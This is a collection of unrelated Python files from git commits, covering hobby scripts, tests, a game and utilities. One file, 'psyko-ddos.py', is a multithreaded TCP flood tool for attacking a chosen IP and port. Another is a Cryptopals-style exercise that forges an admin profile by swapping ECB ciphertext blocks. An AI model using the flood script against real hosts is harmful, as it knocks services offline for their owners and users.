pagePlayers = opener.open(urlPlayers)
strPlayers = codecs.getreader(pagePlayers.headers.get_content_charset())
jsonPlayers = json.load(strPlayers(pagePlayers))['data']['players']
#print(jsonPlayers)
#Get Player ID required to send http command to play content on the chosen player on Synology
for d in jsonPlayers:
PlayerName = d['name']
if PlayerName == player:
PlayerID = d['id']
urlStop = "http://" + IP_syno + ":5000/webapi/AudioStation/remote_player.cgi?api=SYNO.AudioStation.RemotePlayer&method=control&action=stop&id=" + PlayerID + "&version=$
#print(urlStop)
opener.open(urlStop)
| mit | Python |
|
b6daa366a38f224132c8f276d3fbc212964900c2 | add currency | anokata/pythonPetProjects,anokata/pythonPetProjects,anokata/pythonPetProjects,anokata/pythonPetProjects | zametki/currency.py | zametki/currency.py | import requests as req
def getUSD_RUB():
currency_url = 'http://api.fixer.io/latest?symbols=RUB&base=USD'
res = req.get(currency_url).json()
return res['rates']['RUB']
#print(getUSD_RUB())
| mit | Python |
|
df5884cd07d30f8b027b193bc819b61f7a6bdd31 | Create cap_sense_test.py | tinkernauts/raspberrypi | MPR121/cap_sense_test.py | MPR121/cap_sense_test.py | #!/usr/bin/python
######################################################################
"""
cap_sense_test.py - demo to use 12-channel MPR121 capacitive touch
sensor controller as a sound board.
Bart Spainhour <bart@tinkernauts.org>
From Freescale Semiconductor whitepaper:
Proximity Capacitive Touch Sensor Controller - MPR121 OVERVIEW
The MPR121 is the second generation capacitive touch sensor controller
after the initial release of the MPR03x series devices. The MPR121
features increased internal intelligence, some of the major additions
include an increased electrode count, a hardware configurable I2C
address, an expanded filtering system with debounce, and completely
independent electrodes with auto-configuration built in. The device
also features a 13th simulated sensing channel dedicated for near
proximity detection using the multiplexed sensing inputs.
"""
######################################################################
import sys
import time
import Adafruit_MPR121.MPR121 as MPR121
import os
######################################################################
__author__ = "Bart Spainhour"
__email__ = "bart@tinkernauts.org"
######################################################################
# Open communication with MPR121 using default I2C address (0x5A)
# Create MPR121 instance
cap = MPR121.MPR121()
# Check for MPR121 initialization failure
if not cap.begin():
print 'MPR121 init error; check connections.'
sys.exit(1)
######################################################################
# Set sound samples for each cap sensor channel
#
# Drum Kit Layout
#
sound00 = "samples/drum_cymbal_hard.wav"
sound01 = "samples/drum_cymbal_closed.wav"
sound02 = "samples/drum_cymbal_open.wav"
sound03 = "samples/drum_tom_hi_hard.wav"
sound04 = "samples/drum_tom_mid_hard.wav"
sound05 = "samples/drum_tom_lo_hard.wav"
sound06 = "samples/drum_splash_hard.wav"
sound09 = "samples/drum_splash_soft.wav"
sound07 = "samples/drum_heavy_kick.wav"
sound08 = "samples/drum_snare_hard.wav"
sound10 = "samples/drum_bass_hard.wav"
sound11 = "samples/drum_bass_soft.wav"
# # Animal Noise Layout
# #
# sound00 = "sounds/Animal/Horse.wav"
# sound01 = "sounds/Animal/Bird.wav"
# sound02 = "sounds/Animal/Crickets.wav"
# #
# sound03 = "sounds/Animal/Dog2.wav"
# sound04 = "sounds/Animal/Kitten.wav"
# sound05 = "sounds/Animal/Owl.wav"
# #
# sound06 = "sounds/Animal/Duck.wav"
# sound09 = "sounds/Animal/WolfHowl.wav"
# #
# sound07 = "sounds/Animal/Rooster.wav"
# sound08 = "sounds/Animal/Dog1.wav"
# #
# sound10 = "sounds/Animal/Goose.wav"
# sound11 = "sounds/Animal/Meow.wav"
# other sounds from Sonic Pi /opt/sonic-pi/etc/:
# samples/drum_cymbal_pedal.wav
# samples/drum_snare_soft.wav
# samples/drum_tom_hi_soft.wav
# samples/drum_tom_lo_soft.wav
# samples/drum_tom_mid_soft.wav
# samples/drum_cymbal_soft.wav
# other sounds from Scratch /usr/share/scratch/Media/:
# sounds/Animal/Horse.wav
# sounds/Animal/HorseGallop.wav
# sounds/Animal/Bird.wav
# sounds/Animal/Crickets.wav
# sounds/Animal/Dog2.wav
# sounds/Animal/Kitten.wav
# sounds/Animal/Meow.wav
# sounds/Animal/Owl.wav
# sounds/Animal/Duck.wav
# sounds/Animal/WolfHowl.wav
# sounds/Animal/Rooster.wav
# sounds/Animal/Cricket.wav
# sounds/Animal/Dog1.wav
# sounds/Animal/Goose.wav
# sounds/Animal/SeaLion.mp3
# sounds/Animal/Cat.mp3
# Main Loop
try:
print 'Press Ctrl-C to quit.'
while True:
if cap.is_touched(0):
# print 'pin 00 touched'
os.system('aplay -q ' + sound00 +' &')
#
if cap.is_touched(1):
# print 'pin 01 touched'
os.system('aplay -q ' + sound01 +' &')
#
if cap.is_touched(2):
# print 'pin 02 touched'
os.system('aplay -q ' + sound02 +' &')
#
if cap.is_touched(3):
# print 'pin 03 touched'
os.system('aplay -q ' + sound03 +' &')
#
if cap.is_touched(4):
# print 'pin 04 touched'
os.system('aplay -q ' + sound04 +' &')
#
if cap.is_touched(5):
# print 'pin 05 touched'
os.system('aplay -q ' + sound05 +' &')
#
if cap.is_touched(6):
# print 'pin 06 touched'
os.system('aplay -q ' + sound06 +' &')
#
if cap.is_touched(7):
# print 'pin 07 touched'
os.system('aplay -q ' + sound07 +' &')
#
if cap.is_touched(8):
# print 'pin 08 touched'
os.system('aplay -q ' + sound08 +' &')
#
if cap.is_touched(9):
# print 'pin 09 touched'
os.system('aplay -q ' + sound09 +' &')
#
if cap.is_touched(10):
# print 'pin 10 touched'
os.system('aplay -q ' + sound10 +' &')
#
if cap.is_touched(11):
# print 'pin 11 touched'
os.system('aplay -q ' + sound11 +' &')
#
#
time.sleep(0.1)
except KeyboardInterrupt:
print ''
print 'End.'
sys.exit(1)
| mit | Python |
|
16883c227549707ef2a66d7e6020809fe9ecd909 | Add visitor base class | twneale/tater,twneale/tater | tater/visit.py | tater/visit.py | from tater.utils import CachedAttr
class _MethodDict(dict):
'Dict for caching visitor methods.'
def __init__(self, visitor):
self.visitor = visitor
def __missing__(self, node):
name = node.__class__.__name__
method = getattr(self.visitor, 'visit_' + name, None)
self[name] = method
return method
class VisitorBase(object):
@CachedAttr
def _methods(self):
return _MethodDict(visitor=self)
def visit(self, node):
self.node = node
self._visit_nodes(node)
self.finalize()
def _visit_nodes(self, node):
self._visit_node(node)
visit_nodes = self._visit_nodes
for child in node.children:
visit_nodes(child)
def _visit_node(self, node):
func = self._methods[node]
if func is not None:
return func(node)
def finalize(self):
pass
| bsd-3-clause | Python |
|
f291633a4a24aed310f46798ffa2472db4539aaf | Add a pyunit test for type-checking utilities | michalkurka/h2o-3,spennihana/h2o-3,mathemage/h2o-3,h2oai/h2o-dev,jangorecki/h2o-3,h2oai/h2o-3,michalkurka/h2o-3,michalkurka/h2o-3,h2oai/h2o-3,h2oai/h2o-dev,h2oai/h2o-3,spennihana/h2o-3,h2oai/h2o-3,h2oai/h2o-dev,h2oai/h2o-3,spennihana/h2o-3,michalkurka/h2o-3,spennihana/h2o-3,jangorecki/h2o-3,michalkurka/h2o-3,h2oai/h2o-dev,michalkurka/h2o-3,h2oai/h2o-3,h2oai/h2o-3,jangorecki/h2o-3,h2oai/h2o-3,jangorecki/h2o-3,h2oai/h2o-dev,jangorecki/h2o-3,jangorecki/h2o-3,jangorecki/h2o-3,spennihana/h2o-3,mathemage/h2o-3,mathemage/h2o-3,spennihana/h2o-3,h2oai/h2o-dev,mathemage/h2o-3,spennihana/h2o-3,mathemage/h2o-3,mathemage/h2o-3,michalkurka/h2o-3,mathemage/h2o-3,h2oai/h2o-dev | h2o-py/tests/testdir_misc/pyunit_typechecks.py | h2o-py/tests/testdir_misc/pyunit_typechecks.py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""Pyunit for h2o.utils.typechecks."""
from __future__ import absolute_import, division, print_function
from h2o.exceptions import H2OTypeError, H2OValueError
from h2o.utils.typechecks import (U, assert_is_type, assert_matches, assert_satisfies)
def test_asserts():
"""Test type-checking functionality."""
def assert_error(*args, **kwargs):
try:
assert_is_type(*args, **kwargs)
raise RuntimeError("Failed to throw an exception")
except H2OTypeError as e:
# Check whether the message can stringify properly
message = str(e)
assert len(message) < 1000
return
raise RuntimeError("???")
class A(object): pass
class B(A): pass
assert_is_type(3, int)
assert_is_type(2**100, int)
assert_is_type("3", str)
assert_is_type(u"3", str)
assert_is_type("foo", u"foo")
assert_is_type(u"foo", "foo")
assert_is_type("I", *list("ABCDEFGHIJKL"))
assert_is_type(False, bool)
assert_is_type(43, str, bool, int)
assert_is_type(4 / 3, int, float)
assert_is_type(None, None)
assert_is_type(None, A, str, None)
assert_is_type([], [float])
assert_is_type([1, 4, 5], [int])
assert_is_type([1.0, 2, 5], [int, float])
assert_is_type([[2.0, 3.1, 0], [2, 4.4, 1.1], [-1, 0]], [[int, float]])
assert_is_type([1, None, 2], [int, float, None])
assert_is_type({1, 5, 1, 1, 3}, {int})
assert_is_type({1, "hello", 3}, {int, str})
assert_is_type({"foo": 1, "bar": 2}, {str: int})
assert_is_type({"foo": 3, "bar": [5], "baz": None}, {str: U(int, None, [int])})
assert_is_type({"foo": 1, "bar": 2}, {"foo": int, "bar": U(int, float, None)})
assert_is_type((1, 3), (int, int))
assert_is_type(("a", "b", "c"), (int, int, int), (str, str, str))
assert_is_type([1, [2], [{3}]], [int, [int], [{3}]])
assert_is_type(A(), None, A)
assert_is_type(B(), None, A)
assert_is_type(A, type)
for a in range(-2, 5):
assert_is_type(a, -2, -1, 0, 1, 2, 3, 4)
assert_error(3, str)
assert_error("Z", *list("ABCDEFGHIJKL"))
assert_error(u"Z", "a", "...", "z")
assert_error("X", u"x")
assert_error(0, bool)
assert_error(0, float, str, bool, None)
assert_error([1, 5], [float])
assert_error((1, 3), (int, str), (str, int), (float, float))
assert_error(A(), None, B)
assert_error(A, A)
assert_error({"foo": 1, "bar": "2"}, {"foo": int, "bar": U(int, float, None)})
assert_error(3, 0, 2, 4)
url_regex = r"^(https?)://((?:[\w-]+\.)*[\w-]+):(\d+)/?$"
assert_matches("Hello, world!", r"^(\w+), (\w*)!$")
assert_matches("http://127.0.0.1:3233/", url_regex)
m = assert_matches("https://localhost:54321", url_regex)
assert m.group(1) == "https"
assert m.group(2) == "localhost"
assert m.group(3) == "54321"
x = 5
assert_satisfies(x, x < 1000)
assert_satisfies(x, x ** x > 1000)
assert_satisfies(url_regex, url_regex.lower() == url_regex)
try:
assert_satisfies(url_regex, url_regex.upper() == url_regex)
except H2OValueError as e:
assert "url_regex.upper() == url_regex" in str(e), "Error message is bad: " + str(e)
# This test doesn't really need a connection to H2O cluster.
test_asserts()
| apache-2.0 | Python |
|
7dd4919809c626d83cfc17447396aff98e636cfe | Add problem 13 | dimkarakostas/matasano-cryptochallenges | problem_13.py | problem_13.py | from collections import OrderedDict
from crypto_library import ecb_aes_encrypt, ecb_aes_decrypt
from problem_12 import find_blocksize
from crypto_library import apply_pkcs_7_padding
ENCRYPTION_KEY = ',y!3<CWn@1?wwF]\x0b'
def oracle(adversary_input):
profile = profile_for(adversary_input)
return ecb_aes_encrypt(profile, ENCRYPTION_KEY)
def destructure(structured):
attrs = structured.split('&')
destructured = {}
for a in attrs:
parameter, value = a.split('=')
destructured[parameter] = value
return OrderedDict(destructured)
def structure(destructured):
return '&'.join([
'='.join([parameter, value]) for parameter, value in destructured.items()
])
def profile_for(email_addr):
if '&' in email_addr or '=' in email_addr:
raise ValueError('Email address cannot contain "&" or "="')
return structure(OrderedDict([
('email', email_addr),
('uid', '10'),
('role', 'user')
]))
blocksize = find_blocksize(oracle)
# Admin mail length should result in length("email=<admin_mail>&uid=10&role=") multiple of blocksize
admin_mail = 'jim1@test.com'
ciphertext = oracle(admin_mail)
# All blocks minus the last are the encryption of "email=<admin_mail>&uid=10&role="
cipher_blocks = [ciphertext[i*blocksize:(i+1)*blocksize] for i in range(len(ciphertext)/blocksize)]
padded_admin = apply_pkcs_7_padding('admin')
encrypted_padded_admin = oracle((blocksize-len('email='))*'0' + padded_admin)
encrypted_padded_admin_blocks = [encrypted_padded_admin[i*blocksize:(i+1)*blocksize] for i in range(len(encrypted_padded_admin)/blocksize)]
# The second block is the encryption of the padded "admin" string
encrypted_padded_admin_block = encrypted_padded_admin_blocks[1]
# Replace the last block of the profile ciphertext with the valid padded "admin" block
admin_encrypted_profile = ''.join(cipher_blocks[:-1] + [encrypted_padded_admin_block])
print 'Encrypted:', admin_encrypted_profile
print 'Decrypted:', ecb_aes_decrypt(admin_encrypted_profile, ENCRYPTION_KEY)
| mit | Python |
|
253ad82c316bd6d11dcf798e626b7eaf638867bd | add simple font comparison tool in examples | mammadori/pyglet,mammadori/pyglet,mammadori/pyglet,mammadori/pyglet | examples/font_comparison.py | examples/font_comparison.py | #!/usr/bin/env python
# ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
'''A simple tool that may be used to compare font faces.
Use the left/right cursor keys to change font faces.
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id: $'
import pyglet
FONTS = ['Consolas', 'Andale Mono', 'Inconsolata', 'Inconsolata-dz', 'Monaco',
'Menlo']
SAMPLE = '''class Spam(object):
def __init__(self):
# The quick brown fox
self.spam = {"jumped": 'over'}
@the
def lazy(self, *dog):
self.dog = [lazy, lazy]'''
class Window(pyglet.window.Window):
font_num = 0
def on_text_motion(self, motion):
if motion == pyglet.window.key.MOTION_RIGHT:
self.font_num += 1
if self.font_num == len(FONTS):
self.font_num = 0
elif motion == pyglet.window.key.MOTION_LEFT:
self.font_num -= 1
if self.font_num < 0:
self.font_num = len(FONTS) - 1
face = FONTS[self.font_num]
self.head = pyglet.text.Label(face, font_size=24, y=0,
anchor_y='bottom')
self.text = pyglet.text.Label(SAMPLE, font_name=face, font_size=18,
y=self.height, anchor_y='top', width=self.width, multiline=True)
def on_draw(self):
self.clear()
self.head.draw()
self.text.draw()
window = Window()
window.on_text_motion(None)
pyglet.app.run()
| bsd-3-clause | Python |
|
8416f73011ff2d2e53a46e6b575faca919c61de7 | Create rockpaperScissors.py | henrydambanemuya/pygames | rockpaperScissors.py | rockpaperScissors.py | #!/usr/bin/env/ python
#Henry Kudzanai Dambanemuya presents: Rock, Paper, Scissors
#Created: 10/13/2015
#Location: Notre Dame, Indiana
import random
import time
rock = 1
paper = 2
scissors = 3
names = { rock: "Rock", paper: "Paper", scissors: "Scissors" }
rules = { rock: scissors, paper: rock, scissors: paper }
player_score = 0
computer_score = 0
def start():
global human
print "\n"
human = raw_input("Please enter your name: ");
print "\n"
print "Hi %r, let's play a game of Rock, Paper, Scissors." %human
while game():
pass
scores()
def game():
player = move()
computer = random.randint(1,3)
result(player, computer)
return play_again()
def move():
while True:
print
player = raw_input("Rock = 1\nPaper = 2\nScissors = 3\n\nMake a move: ")
try:
player = int(player)
if player in (1,2,3):
return player
except ValueError:
pass
print "\n"
print "Oops! I didn't understand that. Please enter 1, 2, or 3."
def result(player, computer):
print "\n"
print "1..."
time.sleep(1)
print "2..."
time.sleep(1)
print "3..."
time.sleep(0.5)
print "\n"
print "Computer threw {0}!".format(names[computer])
global player_score, computer_score
if player == computer:
print "\n"
print "Tie Game"
else:
if rules[player] == computer:
print "\n"
print "Your victory has been assured."
player_score += 1
else:
print "\n"
print "The computer laughs as you realize you have been defeated."
computer_score += 1
def play_again():
print "\n"
answer = raw_input("Would you like to play again? Y/N?: ")
if answer in ("y", "Y", "yes", "Yes", "yeah!", "Yeah!", "Of course!"):
return answer
else:
print "\n"
print "Thanks for playing :)"
def scores():
global player_score, computer_score, human
print "\n"
print "HIGH SCORES"
print human, player_score
print "Computer: ", computer_score
print "\n"
if __name__ == '__main__':
start()
| mit | Python |
|
a1ba3031171992e4c07bef13b6edcdb1b80e32e6 | Create psyko-ddos.py | bhammond101p/psyko-ddos | psyko-ddos.py | psyko-ddos.py | """
Title: Psyko DDoS
Type: Hacking Tool
Version: 1.0
Author: Brandon Hammond
Summary: Psyko DDoS is a Python DDoS
tool that uses TCP packets
to conduct a layer 4 DDoS
attack on the target IP
address at the given port.
It uses multithreading to
distribute the DDoS attack
over multiple threads, thus
amplifying it.
"""
import os
import sys
import time
import socket
import threading
def ddosAttack(ip,port,timer):
#DDoS attack function
timeout=time.time()+timer
message="Psyko DDoS TCP Flood..."
print("DDoSing %s..." % ip)
while time.time()<timeout:
#Generate and send TCP packet to DDoS
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.sendto(message,(ip,port))
print("DDoS ended...") #Display this when DDoS has timed out
if __name__=="__main__":
#Main GUI
threads=[]
print("=")*50
print("Psyko DDoS")
print("v1.0")
print("By Brandon Hammond")
print("=")*50
try:
#Get all required values
ip=raw_input("IP: ")
port=input("Port: ")
timer=input("Time: ")
threads=input("Threads: ")
except:
#If invalid input type is entered this executes
print("Input error...")
for i in range(threads):
#Generate threads
t=threading.Thread(target=ddosAttack,args=(ip,port,timer))
t.start()
| cc0-1.0 | Python |
|
dd36aef29cd1e45ec447260f9ac8848a86a430dc | Create ptb_reader.py | cjratcliff/adaptive-regularization | ptb_reader.py | ptb_reader.py | from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import os
import sys
import tensorflow as tf
def _read_words(filename):
with open(filename, "r") as f:
if sys.version_info[0] >= 3:
return f.read().replace("\n", "<eos>").split()
else:
return f.read().decode("utf-8").replace("\n", "<eos>").split()
def _build_vocab(filename):
data = _read_words(filename)
counter = collections.Counter(data)
count_pairs = sorted(counter.items(), key=lambda x: (-x[1], x[0]))
words, _ = list(zip(*count_pairs))
word_to_id = dict(zip(words, range(len(words))))
return word_to_id
def _file_to_word_ids(filename, word_to_id):
data = _read_words(filename)
return [word_to_id[word] for word in data if word in word_to_id]
def ptb_raw_data(data_path = "data/"):
train_path = os.path.join(data_path, "ptb.train.txt")
valid_path = os.path.join(data_path, "ptb.valid.txt")
test_path = os.path.join(data_path, "ptb.test.txt")
word_to_id = _build_vocab(train_path)
train_data = _file_to_word_ids(train_path, word_to_id)
valid_data = _file_to_word_ids(valid_path, word_to_id)
test_data = _file_to_word_ids(test_path, word_to_id)
return train_data, valid_data, test_data, word_to_id
| apache-2.0 | Python |
|
532fdfa4a0fa4f0f5f441a572eef739f081e6522 | Create hello.py | komeiy/jenkins_cron | hello.py | hello.py | #!/usr/bin/env python
print 'hello world'
| mit | Python |
|
98d956b6a249caeaee76732a0679c2dd3384cda7 | Create pytemplate.py | ismaproco/pytemplate | pytemplate.py | pytemplate.py | import os,sys,string
file_name = ""
if sys.argv[1] == "":
file_name = "template.tf"
else:
file_name = sys.argv[1]
path = []
def build_path():
s_path = ""
for i in path:
s_path += i + "\\"
return s_path
type_state = []
def manage_state(word,operation):
if operation == "append":
type_state.append(word)
elif (operation == "pop"):
type_state.pop()
class f_tree:
identifier = 0
level = 0
name = ""
creation_type = ""
path = ""
father = None
def __str__(self):
return str(self.identifier) + " " + self.creation_type + " " + self.name + " " + self.path
f = open(file_name, 'r')
text = string.replace(f.read(), " ","")
word_dictionary = []
word = ""
open_tokens = ['[','{','(']
close_tokens = [']','}',')']
general_tokens = [',','/','\\','\n','\t']
break_word = False
#states
#s -> none, folder, file, end_token
reading_token = False
identifier = 0
temp_state_identifier = ""
pop_folder = False
for c in text:
if general_tokens.count(c) > 0 or open_tokens.count(c) > 0 or close_tokens.count(c) > 0:
reading_token = True
break_word = True
else:
reading_token = False
if break_word:
if word != "":
f = f_tree()
f.identifier = identifier
f.name = word
f.creation_type = type_state[-1]
f.Father = None
word_dictionary.append(f)
if type_state[-1] == "folder":
if(len(type_state) == len(path)):
path.pop()
path.append(word)
f.path = build_path()
if type_state[-1] == "file":
f.path += word
word = ""
identifier += 1
if c == "[":
type_state.append("folder")
elif c == "{":
type_state.append("file")
if c == "]":
type_state.pop()
path.pop()
elif c == "}":
type_state.pop()
if not reading_token and type_state[-1] != "none":
word += c
reading_token = False
break_word = False
for f in word_dictionary:
if f.creation_type == "folder":
final_path = os.path.dirname(os.path.abspath(__file__)) +"\\"+ f.path
if not os.path.exists(f.path):os.makedirs(final_path)
if f.creation_type == "file":
open(f.path,"w+")
| mit | Python |
|
f4d70c81c55e744ef6ff4dd9fded2ca6e771fe30 | add missing profiles migration | openstates/openstates.org,openstates/openstates.org,openstates/openstates.org,openstates/openstates.org | profiles/migrations/0003_auto_20210225_1754.py | profiles/migrations/0003_auto_20210225_1754.py | # Generated by Django 2.2.16 on 2021-02-25 17:54
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("profiles", "0002_auto_20200903_1942"),
]
operations = [
migrations.AlterField(
model_name="profile",
name="api_tier",
field=models.SlugField(
choices=[
("inactive", "Not Yet Activated"),
("suspended", "Suspended"),
("default", "Default (new user)"),
("legacy", "Legacy"),
("bronze", "Bronze"),
("silver", "Silver"),
("unlimited", "Unlimited"),
],
default="inactive",
),
),
]
| mit | Python |
|
14caf06fe4f30be96f0397f935df1daf48d40d81 | Create report.py | ferdiaz/python-quickbooks,ZachGoldberg/python-quickbooks,troolee/quickbooks-python,sidecars/python-quickbooks,porn/python-quickbooks,emburse/python-quickbooks | report.py | report.py | """
This module is for API consumer-side reporting on QBOv3-querried transactions.
In addition to mimmicking such features as "QuickReport," "General Ledger,"
"Profit & Loss," et al, it provides some helpful functions, such as finding
the starting and ending balance of a particular account as of a particular
date and, of course, finding the total activity between two dates.
"""
import reference as qbrefs
import massage as qbm
import copy
def quick_report(qbo_session, filter_attributes={}, headers=True):
"""
Simulates a 'Quick Report' in QB by pulling getting the lines of
all transactions that match the attributes we're passed.
This match is a simple eq (=) matcher because that's how QB does it
as a first cut. You can later filter by date, total by various things,
etc., but this doesn't do that...other reporting tools will.
One potentially helpful tool though is the ability to include multiple
criteria for any one attribute (in the form of a list), so you can
run a quick_report on several classes and several accounts at once, e.g.
Note that even though QB can do a "Quick Report" on a vendor
or other Name List-type object, this method can't (yet). This is for
transactions ONLY.
Also note that because a quick_report pulls in PARTIAL transactions,
we aren't going to return whole transactions. Rather, we're going
to return ledger-like lines of relevant transactions.
(See massage.ledgerize() for more info on the output of this method.)
As a couresty, we WILL sort the transactions by date (as qb would...)
"""
#basically, you can filter on any attribute massage.ledgerize() kicks out
filterable_attributes = {
"TxnDate":0, "qbbo_type":1, "entity_id":2,
"line_number":3, "document_type":4,
"domain":5, "user_number":6,
"CreateTime":7, "LastUpdatedTime":8, "SyncToken":9, "Adjustment":10,
"account":11, "amount":13, "description":14, "name":15,
"linked_transactions":16
}
line_i = filterable_attributes["line_number"]
fa = copy.deepcopy(filter_attributes)
for a in filter_attributes:
if not a in filterable_attributes:
raise Exception("QuickReport() doesn't know how to filter on"+
" %s. Please use one of:\n%s" %
(a, filterable_attributes))
#yes, we're being permissive
if isinstance(filter_attributes[a],(int,float,long,str)):
fa[a]=[filter_attributes[a]]
elif isinstance(filter_attributes[a],(list,tuple)):
fa[a]=filter_attributes[a]
else:
raise Exception("filter_attributes items must be lists," + \
"tuples, or stand-alone values")
transactions = qbo_session.transactions()
entity_list = qbm.entity_list(transactions)
ledger_lines_dict = {}
for transaction in entity_list:
qbbo, Id, _ = transaction
this_transactions_lines = (qbo_session.ledgerize(transaction))
for line in this_transactions_lines:
k = qbbo+Id+str(line[line_i])
ledger_lines_dict[k] = line
#let's first sort by date...
date_ordered_k_list = sorted(ledger_lines_dict.iterkeys(), key= \
lambda k: ledger_lines_dict[k][0])
filtered_lines = [qbo_session.ledgerize("_", headers=True)]
for k in date_ordered_k_list:
ledger_line = ledger_lines_dict[k]
#print ledger_line
#now let's apply the filter, white-list style
for a in fa:
white_list = fa[a]
#sometimes a Line will just HAVE the attribute
#e.g. a JournalEntry line will always have an account
#othertimes, we'll have to look it up with a cross reference
#e.g. an Invoice line will NOT have an account, it'll have
#an item, so we need to look up the account in the item
#so we're breaking that functionality out into it's own function
i = filterable_attributes[a]
if ledger_line[i] in white_list:
filtered_lines.append(ledger_line)
return filtered_lines
def pnl(qbo_session, start_date="first", end_date="last", period = "years"):
raise NotImplementedError
def bs(qbo_session, first_date="first", last_date="last", period = "years"):
raise NotImplementedError
def cf(qbo_session, start_date="first", end_date="last", period = "years"):
raise NotImplementedError
| mit | Python |
|
79acf77b7d711c88ea0ca8a733721ce5285f9a00 | Create Randomkick.py | Jake0720/XChat-Scripts | Randomkick.py | Randomkick.py | __module_name__ = 'Random Kick Reason'
__module_version__ = '0.1'
__module_description__ = 'Kicks the designated player with a random kick reason.'
__module_author__ = 'Jake0720'
rkickhelp = '\x02USAGE: /rk <nick>'
import xchat
import random
def rk(word, word_eol, userdata):
rkicks = (('Goodbye','See you later','Cya','Bye','Later!'))
try:
xchat.command('kick ' + word[1] + ' ' + random.choice(rkicks))
except:
xchat.prnt('\x0304Error!')
def onUnload(userdata):
xchat.prnt('\x0304 %s has been unloaded.' % __module_name__)
xchat.hook_command('rk', rk, help=rkickhelp)
xchat.hook_unload(onUnload)
xchat.prnt('\x0304 %s has been loaded.' % __module_name__)
| mit | Python |
|
d021c05e483f556122d0f3251c2a299e0c47792c | add language detection code (even if it's not used) | ma2rten/kaggle-evergreen | src/detect_language.py | src/detect_language.py | def determine_language(item):
import langid
# latin my ass
def classify(s):
rank = langid.rank(s)
if rank[0][0] == 'la':
return rank[1][0]
return rank[0][0]
# extract text
soup = boil_soup(item)
for tag in ['script', 'style']:
for el in soup.find_all(tag):
el.extract()
s = soup.body.text
# determine language
lang = classify(s)
if lang != 'en':
if classify(unidecode(s)) == 'en':
return 'en'
return lang
| mit | Python |
|
f0392ebda49fa0222a3b317f50002d7e03659f47 | Test we can approve Flutterwave bank accounts | onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle,onepercentclub/bluebottle | bluebottle/funding_flutterwave/tests/test_states.py | bluebottle/funding_flutterwave/tests/test_states.py | from bluebottle.files.tests.factories import PrivateDocumentFactory
from bluebottle.funding.tests.factories import FundingFactory, PlainPayoutAccountFactory, \
BudgetLineFactory
from bluebottle.funding_flutterwave.tests.factories import FlutterwaveBankAccountFactory
from bluebottle.test.utils import BluebottleTestCase
from bluebottle.initiatives.tests.factories import InitiativeFactory
class FlutterwavePayoutAccountTestCase(BluebottleTestCase):
def setUp(self):
self.initiative = InitiativeFactory.create(status='approved')
self.funding = FundingFactory.create(initiative=self.initiative)
self.document = PrivateDocumentFactory.create()
self.payout_account = PlainPayoutAccountFactory.create(document=self.document)
self.bank_account = FlutterwaveBankAccountFactory.create(connect_account=self.payout_account)
self.funding.bank_account = self.bank_account
self.funding.save()
BudgetLineFactory.create(activity=self.funding)
def test_approve_bank_account(self):
self.bank_account.states.verify(save=True)
self.bank_account.refresh_from_db()
self.assertEqual(self.bank_account.status, 'verified')
self.payout_account.refresh_from_db()
self.assertEqual(self.payout_account.status, 'verified')
self.funding.refresh_from_db()
self.assertEqual(self.funding.status, 'submitted')
| bsd-3-clause | Python |
|
9c3449cdfa7b39069b691b31ff75defa7cf9b302 | add example.py | daler/metaseq,mrGeen/metaseq,agrimaldi/metaseq,mrGeen/metaseq,agrimaldi/metaseq,daler/metaseq,daler/metaseq,mrGeen/metaseq,agrimaldi/metaseq | doc/example.py | doc/example.py | import numpy as np
import os
import metaseq
ip_filename = metaseq.helpers.example_filename(
'wgEncodeHaibTfbsK562Atf3V0416101AlnRep1_chr17.bam')
input_filename = metaseq.helpers.example_filename(
'wgEncodeHaibTfbsK562RxlchV0416101AlnRep1_chr17.bam')
ip_signal = metaseq.genomic_signal(ip_filename, 'bam')
input_signal = metaseq.genomic_signal(input_filename, 'bam')
# If you already have TSSs, skip this part.
import gffutils
db = gffutils.FeatureDB(
metaseq.example_filename('Homo_sapiens.GRCh37.66_chr17.gtf.db'))
import pybedtools
from pybedtools.featurefuncs import TSS
from gffutils.helpers import asinterval
def tss_generator():
for transcript in db.features_of_type('transcript'):
yield TSS(asinterval(transcript), upstream=1000, downstream=1000)
if not os.path.exists('tsses.gtf'):
tsses = pybedtools.BedTool(tss_generator()).saveas('tsses.gtf')
tsses = pybedtools.BedTool('tsses.gtf')
from metaseq import persistence
if not os.path.exists('example.npz'):
ip_array = ip_signal.array(tsses, bins=100, processes=8)
input_array = input_signal.array(tsses, bins=100, processes=8)
ip_array /= ip_signal.mapped_read_count() / 1e6
input_array /= input_signal.mapped_read_count() / 1e6
persistence.save_features_and_arrays(
features=tsses,
arrays={'ip': ip_array, 'input': input_array},
prefix='example',
link_features=True,
